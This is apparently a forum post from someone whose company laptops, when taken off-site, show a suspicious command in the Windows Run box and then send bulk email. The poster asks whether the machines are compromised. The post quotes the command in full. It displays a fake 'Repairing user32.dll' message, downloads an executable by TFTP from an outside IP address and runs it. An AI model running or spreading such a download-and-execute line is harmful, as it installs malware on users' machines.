In my company, some people take laptops out in the field, aka the real world..

Many have reported, and I have seen myself, lots of emails being sent after something like this shows up in the start>run window ..

%comspec% /c echo Repairing user32.dll & echo Please Wait... tftp -i 75.132.3.206 GET xpjush.exe & start xpjush&
I've turned the windows firewall back on and I think that'll do it, but I was wondering if the machine was definitely compromised or if it was something that could be stopped.. ?